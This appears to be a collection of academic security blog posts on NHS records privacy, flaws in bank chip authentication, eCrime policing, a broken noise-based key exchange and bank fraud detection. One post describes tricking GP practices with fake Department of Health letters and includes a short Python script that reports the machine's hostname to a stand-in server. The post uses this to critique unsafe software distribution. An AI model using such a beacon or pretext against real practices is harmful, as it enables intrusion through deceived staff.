Opting out of the NHS Database

The front page lead in today’s Guardian explains how personal medical data (including details of mental illness, abortions, pregnancy, drug taking, alcohol abuse, fitting of colostomy bags etc etc) are to be uploaded to a central NHS database regardless of patients’ wishes.

The Government claims that especially sensitive data can be put into a “sealed envelope” which would not ordinarily be available… except that NHS staff will be able to “break the seal” under some circumstances; the police and Government agencies will be able to look at the whole record — and besides, this part of the database software doesn’t even exist yet, and so the system will be running without it for some time.

The Guardian has more details in the article ‘From cradle to grave, your files available to a cast of thousands’, some comments from doctors and other health professionals in ‘A national database is not essential’, and a leading article, ‘Spine-chilling’.

The Guardian gives details on how to opt out of data sharing in ‘What can patients do?’, drawing on suggestions for a letter from our own Ross Anderson, who has worked on medical privacy for over a decade (see his links to relevant research).

If you are concerned (and in my view, you really should be — once your data is uploaded it will be pretty much public forever), then discuss it with your GP and write off to the Department of Health [*]. The Guardian gives some suitable text, or you could use the opt-out letter that FIPR developed last year (PDF or Word versions available).

[*] See Ross’s comment on this article first!

Yet another insecure banking system

The banks are thinking about introducing a new anti-phishing measure called the ‘chip authentication protocol’ (CAP). Each customer gets a device like a pocket calculator: you put in your ‘chip and PIN’ (EMV) card, enter your PIN (the same PIN you use for ATMs), and it displays a one-time authentication code that you use to log on to your electronic banking service, instead of the current password and security question. The code is computed by the card, which encrypts a transaction counter using the EMV authentication cryptogram generation key – the same key the EMV protocol uses to generate a MAC on an ATM or store transaction. The use model is that everyone will have a CAP calculator; you’ll usually use your own, but can lend it to a friend if he’s caught short.
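To make the mechanics concrete, here is a minimal sketch of how such a device could derive its code. This is an illustration under assumptions, not the real EMV computation: actual CAP uses the card’s 3DES-based application cryptogram over EMV-specified data, whereas the key, the HMAC-SHA256 MAC and the truncation below are stand-ins.

```python
import hashlib
import hmac
import struct

def cap_code(card_key: bytes, atc: int, digits: int = 8) -> str:
    """One-time code: a MAC over the application transaction counter (ATC).

    Real CAP uses the card's EMV application cryptogram (a 3DES MAC);
    HMAC-SHA256 here is only a stand-in for illustration.
    """
    mac = hmac.new(card_key, struct.pack(">H", atc), hashlib.sha256).digest()
    # Truncate to a short decimal code the customer can type in.
    return str(int.from_bytes(mac[:4], "big") % 10**digits).zfill(digits)

# Anyone who can run the protocol with the card (say, a tampered shop
# terminal) can compute codes for future counter values in advance:
demo_key = b"\x01" * 16  # hypothetical per-card key
for counter in range(1000, 1005):
    print(counter, cap_code(demo_key, counter))
```

The point to note is that everything needed to generate future codes is the key and the counter, which is exactly what the attacks below exploit.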

I can see several problems with this. First, when your wallet gets nicked the thief will be able to read your PIN digits from the calculator – they will be the dirty and worn keys. If you just use one bank card, then the thief’s chance of guessing your PIN in 3 tries has just come down from about 1 in 3000 to about 1 in 10. Second, when you use your card in a Mafia-owned shop (or in a shop whose terminals have been quietly reprogrammed) the bad guys have everything they need to loot your account. Not only that – they can compute a series of CAP codes to give them access in the future, and use your account for wicked purposes such as money laundering. Oh, and once all UK banks (not just Coutts) use one-time passwords, the phishermen will just rewrite their scripts to do real-time man-in-the-middle attacks.
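The PIN-guessing estimate above is easy to sanity-check, assuming the four worn keys reveal four distinct digits:

```python
from itertools import permutations

# If wear reveals which four digits the PIN uses, only their order is
# unknown: 4! = 24 possibilities, and the thief gets three tries.
orderings = len(set(permutations("1379")))  # 24 (digits are illustrative)
print(f"3 tries out of {orderings} orders: {3 / orderings:.3f}")  # 0.125
```

That is 1 in 8; if the PIN repeats a digit the thief’s odds are better still, so ‘about 1 in 10’ is if anything conservative.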

I suspect the idea of trying to have a uniform UK solution to the phishing problem may be misguided. Bankers are herd animals by nature, but herding is a maladaptive response to phishing and other automated attacks. It might be better to go to the other extreme, and have a different interface for each customer. Life would be harder for the phishermen, for example, if I never got an email from the NatWest but only ever from Bernie Smith my ‘relationship banker’ – and if I were clearly instructed that if anyone other than Bernie ever emailed me from the NatWest then it was a scam. But I don’t expect that the banks will start to act rationally on security until the liability issues get fixed.

How to hack your GP's computer system

It’s easy – you just send them a letter on what appears to be Department of Health notepaper telling them to go to a URL, download a program, load it on their practice system, and run it. The program does something with the database, extracts some information and sends it back to whoever wrote it.

I have written to one of the medical magazines explaining why this is not a good way to do things. Doctors would never dream of injecting some random potion they received through the post into their patients – they’d insist on peer review, licensing, and a trustworthy supply chain. So who reviewed the specification of this software? Who evaluated the implementation? Who accepts liability if it corrupts the patient database, leading to a fatal accident?

Were it not for the Computer Misuse Act, I would email 100 practices at random with a version of the above letter, telling them to run my software – which would simply report back who ran it. From talking to a handful of doctors I reckon most of them would fall for it.
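For what it’s worth, such a program need be only a few lines long. A sketch, with a made-up collection URL, that touches no patient data and merely reports which machine ran it:

```python
import socket
import urllib.parse
import urllib.request

# Report the hostname of the machine that ran this script back to a
# hypothetical collection server (example.org stands in for a real URL).
payload = urllib.parse.urlencode({"practice": socket.gethostname()}).encode()
urllib.request.urlopen("https://example.org/beacon", data=payload)
```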

No doubt the bad guys will start doing this sort of thing. Eventually doctors, lawyers and everyone else will learn the simple lesson ‘don’t install software’. Until then, this will be the smart way to help yourself to the juicy, meaty bits of a target organisation’s data. So what will we call it? Philleting?

Mainstreaming eCrime

Back in February I wrote about how the establishment of the Serious Organised Crime Agency (SOCA) was likely to lead to a situation in which “level 2” eCrime could end up failing to be investigated. “Level 1” crime is “local” to a single police force; “level 3” crime is “serious” or “organised” and requires tackling at a national or international level; “level 2” crime is what’s in between: occurring across the borders of local police forces, but not serious or organised enough to be SOCA’s problem.

Over the past few weeks I’ve been at a Metropolitan Police “Knowledge Forum” and at a Parliament and Internet Conference. There I’ve learnt about how the police (at ACPO level, not just the Met) are intending to tackle eCrime in the future.

The jargon for the new policy is “mainstreaming” — by which is meant that the emphasis will move away from tackling “eCrime” as something special, and regular officers will deal with it just as “Crime”.

In particular when there are “e” aspects to a normal crime, such as a murder, then this will be dealt with as a matter of course, rather than be treated as something exotic. With the majority of homes containing computers, and with the ubiquity of email, instant messaging and social network sites, this can only be seen as a sensible adaptation to society as it is today. After all, the police don’t automatically call in specialist officers just because the murder victim owns a car.

Although there is a commitment to maintain existing centres of excellence (specialist units with expertise in computer forensics, units that tackle “grooming” by paedophiles, and undercover police who deal with obscene publications), I am less sanguine about the impact of this policy on crimes that rely upon the Internet for their commission. Such crimes can be highly automated, operated from a distance, hard to track down and obtain evidence about, and lucrative even when only small amounts are stolen from each victim.

I believe there is still some doubt that Internet-based crimes will be investigated, not just from lack of resources (always a problem, as anyone who has been burgled or had a car window smashed will know), but because it’s no-one’s task and appears on no-one’s checklist for meeting Government targets (there is still no central counting of eCrime).

Mainstreaming comes with some sensible adjuncts: police forces will be encouraged to pool intelligence about eCrime (to build up a picture of its full impact and to link investigators together), and some sort of national coordination centre is planned to partially replace the NHTCU. This may sometimes mean that an investigation can be mounted into an eBay fraudster in Kent who rips off people in Lancashire and Dorset, but I am not sure the same will be true if the victims are in Louisiana and Delaware, or if the fraudster lives in a suburb of Bucharest.

The details of what “mainstreaming” will mean for eCrime are still being worked out, so it’s too early to say exactly how it will operate. It sounds like an improvement on the current arrangements, but I’m pessimistic about it really getting to grips with many of the bad things that continue to happen on the Internet.

New website on NHS IT problems

At http://nhs-it.info, colleagues and I have collected material on the NHS National Programme for IT, which shows all the classic symptoms of a large project failure in the making. If it goes belly-up, it could be the largest IT disaster ever, and could have grave consequences for healthcare in Britain. With 22 other computer science professors, I wrote to the Health Select Committee urging them to review the project. The Government is dragging its feet, and things seem to be going from bad to worse.

Kish's "totally secure" system is insecure

Recently, Kish proposed a “totally secure communication system” that uses only resistors, wires and Johnson noise. His paper, “Totally Secure Classical Communication Utilizing Johnson (-like) Noise and Kirchoff’s Law”, was published in Physics Letters (March 2006).

The paper was featured in Science magazine (Vol. 309), reported in news articles (Wired News, Physorg.com) and discussed on several weblogs (Schneier on Security, Slashdot). The initial sensation was that quantum communication could now be replaced by a much cheaper means. But not quite so…

This paper—to appear in IEE Information Security—shows that the design of Kish’s system is fundamentally flawed. The theoretical model, which underpins Kish’s system, implicitly assumes thermal equilibrium throughout the communication channel. This assumption, however, is invalid in real communication systems.

Kish used a single symbol ‘T’ to denote the channel temperature throughout his analysis. This, however, disregards the fact that any real communication system has to span a distance and endure different conditions. A slight temperature difference between the two communicating ends will lead to security failure—allowing an eavesdropper to uncover the secret bits easily (more details are in the paper).
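To see how little it takes, here is a back-of-envelope simulation. The wire-voltage formula follows from a standard voltage-divider argument; the resistor values, temperatures and the 1 K mismatch are my own illustrative choices, not figures from either paper.

```python
# In the "secure" bit states the two ends hold different resistors
# (low-high vs high-low), and Eve must not be able to tell which end
# holds which.  The Johnson-noise voltage PSD seen on the wire is
#   S_U = 4k(T_A*R_A*R_B^2 + T_B*R_B*R_A^2) / (R_A + R_B)^2,
# which is symmetric under swapping the ends only when T_A == T_B.
k = 1.380649e-23        # Boltzmann constant, J/K
R_LO, R_HI = 1e3, 1e5   # the two resistor values, ohms (illustrative)

def wire_voltage_psd(Ra, Ta, Rb, Tb):
    return 4 * k * (Ta * Ra * Rb**2 + Tb * Rb * Ra**2) / (Ra + Rb) ** 2

for Ta, Tb in [(300.0, 300.0), (300.0, 301.0)]:   # exact match vs 1 K off
    lh = wire_voltage_psd(R_LO, Ta, R_HI, Tb)     # Alice low, Bob high
    hl = wire_voltage_psd(R_HI, Ta, R_LO, Tb)     # Alice high, Bob low
    print(f"dT = {Tb - Ta:+.0f} K: LH = {lh:.4e}, HL = {hl:.4e}, "
          f"distinguishable = {lh != hl}")
```

With equal temperatures the two arrangements produce identical spectra; with a 1 K mismatch they differ, and Eve reads the bit off a voltmeter.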

As a countermeasure, it might be possible to make the temperature difference between the two ends as small as possible, for example by using external thermal noise generators. However, this gives no security guarantee: instead of requiring a fast computer, an eavesdropper now merely needs a voltmeter that is more accurate than the equipment used by Alice and Bob.

In addition, the transmission line must maintain the same temperature (and noise bandwidth) as the two ends to ensure “thermal equilibrium”, which is clearly impossible. Kish avoids this problem by assuming zero resistance on the transmission line. Since the problem of finite line resistance has been reported before, I will not discuss it further here.

To sum up, the mistake in Kish’s paper is that the author wrongly grafted assumptions from one subject onto another. In circuit analysis, it is common practice to assume the same room temperature throughout and to ignore wire resistance in order to simplify calculation; the resulting discrepancy is usually well within the tolerable range. The design of a secure communication system is very different: a tiny discrepancy can severely compromise its security. Basing security upon invalid assumptions is a fundamental flaw in the design of Kish’s system.

Boom! Headshot!

It’s about time I confessed to playing online tactical shooters. These are warfare-themed multiplayer games that pit two teams of 16 to 32 players against each other, to capture territory and score points. They can be great fun if you are so inclined; what’s more, they’re big money these days. A big online shooter like Counterstrike might sell maybe 2 million copies, and the tactical shooter Battlefield 2 has almost 500,000 accounts on the main roster. The modern blockbuster game grosses several times more than a blockbuster movie!

In this post I consider a vital problem for game designers, maintaining the quality of experience for the casual gamer, and it turns out this is in part a security problem. People gravitate towards these games because the thrill of competition against real humans (instead of AI) is tangible, but this is a double-edged sword. Put simply, the enemy of the casual gamer is gross unfairness in online play. But why do these games feel so unfair? Why do you shake the hand of a squash player, or clap your footie opponent on the back after losing a good game, but walk away from a loss in a tactical shooter angry, frustrated and maybe even abusive? Is it just the nature of the clientele?

This post introduces a draft paper I’ve written called “Boom! Headshot! (Building Neo-Tactics on Network-Level Anomalies in Online Tactical First-Person Shooters)” (named after this movie clip), which may hold some of the answers to understanding why there is so much perceived unfairness. If the paper is a little dense, try the accompanying presentation instead.

Do you want to know more? If so, read on…

Closing in on suspicious transactions

After almost 3 years of problem-free banking in the UK, I recently received the following letter from HSBC’s “Accounts Review Team”. It advised me that the HSBC Group no longer wished to have me as a customer, and that I had 30 days to move my banking to an establishment in no way connected to HSBC, before they would close my account. Confident that I had not indulged in any illegal activity recently, and concerned about their reasons for taking such action, I attempted several times to phone the number given in the letter, but each time reached only a “we are busy, please try again” recording. Visiting my home branch was not much more helpful, as they claimed that the information had not been shared with them. I was advised to make a written complaint, and was told that the branch had already referred the matter, as a number of customers had come in with similar letters.

After two written complaints and a phone call to customer services, a member of the “Team” finally contacted me. She enquired about a single international deposit into my account, which I explained to be my study grant for the coming year. Upon this explanation I was told that the bank would not close my account after all, and I was given a vague explanation that they did not expect students to receive large deposits. I found this strange, since it had not been a problem in previous years, and stranger still since my deposit had cleared into my account two days after the letter was sent. In terms of recent “suspicious” transactions, this left only two international deposits: one from my parents overseas and one from my savings, neither of which could be classified as large. I’m not an expert on behavioural analysis and fraud detection within banking systems, but I would expect that study grants and family support are hardly unexpected for students. Moreover, rather than this being an isolated incident, it seems that HSBC’s “account review” affected a number of people within our student community, some of whom might choose not to question the decision and could be left without bank accounts. This should raise questions about the effectiveness of their fraud detection system, or possibly about a flawed behaviour model for a specific demographic.

My account is now restored, but I have still had no satisfactory explanation of why the decision was made to close it, nor do I know how this sorry affair will affect my future banking and credit rating. Would an attempt to transfer my account have caused HSBC’s negative opinion of me to spread to other institutions? A security mechanism that yields false positives, or that recommends a disproportionate reaction such as closing an account on the strength of a single unexpected transaction, should be seen as flawed. The end result is a system that runs on a guilty-until-proven-innocent premise, with the onus for correcting marginal calls placed on the customer. The bank will ultimately claim that these mechanisms are designed to protect the customer, but randomly threatening to close my account does not make me feel any safer.

Random isn't always useful

It’s common to think of random numbers as an essential building block in security systems. Cryptographic session keys are chosen at random, then shared with the remote party. Security protocols use “nonces” for “freshness”. Randomness can also slow down information-gathering attacks, though there it is seldom a panacea. However, as George Danezis and I recently explained in “Route Fingerprinting in Anonymous Communications”, randomness can lead to uniqueness: exactly the property you don’t want in an anonymity system.
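A toy calculation, with made-up parameters rather than anything from the paper, shows how quickly random choices become identifying. Suppose each client of an anonymity network picks, once and for all, a random set of three entry nodes out of a thousand:

```python
from math import comb

NODES, K, USERS = 1000, 3, 100_000        # illustrative parameters
route_sets = comb(NODES, K)               # C(1000, 3) possible node sets
collisions = comb(USERS, 2) / route_sets  # expected pairs sharing a set
print(f"{route_sets:,} possible sets; about {collisions:.0f} colliding "
      f"pairs among {USERS:,} users, so nearly every set is unique")
```

With these numbers almost every user’s node set is unique, so the set itself acts as a fingerprint that follows the user around.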

Which services should remain offline?

Yesterday I gave a talk on confidentiality at the EMIS annual conference, where I gained yet more insights into Britain’s disaster-prone health computerisation project. Why, for example, will it cost eleven figures, when EMIS writes the software used by 60% of England’s GPs to manage their practices on an annual development budget of only £25m?

On the consent front, it turns out that patients who exercise even the mildest form of opt-out from the national database (having their addresses stop-noted, which is the equivalent of going ex-directory — designed for celebs and people in witness protection) will not be able to use many of the swish new features we’re promised, such as automatic repeat prescriptions. There are concerns that providing a degraded health service to people who tick the privacy box might undermine the validity of consent to information sharing.

On the confidentiality front, people are starting to wrestle with the implications of allowing patients online access to their records. Vulnerable patients, for example under-age girls who have had pregnancy terminations without telling their parents, could be at risk if they can access sensitive data online. They may be coerced into accessing it, or their passwords may become known to friends and family. So there’s talk of a two-tier online record, in effect introducing multilevel security into record access: patients would be asked whether they wanted some, all, or none of their records to be available to them online. I don’t think the Department of Health understands the difficulties of multilevel security. I can’t help wondering whether online patient access is needed at all. Very few patients ever exercise their right to view and get a copy of their records; making all records available online seems more and more like a political gimmick to get people to accept the agenda of central data collection.

We don’t seem to have good ways of deciding what services should be kept offline. There’s been much debate about elections, and here’s an interesting case from healthcare. What else will come up, and are there any general principles we’re missing?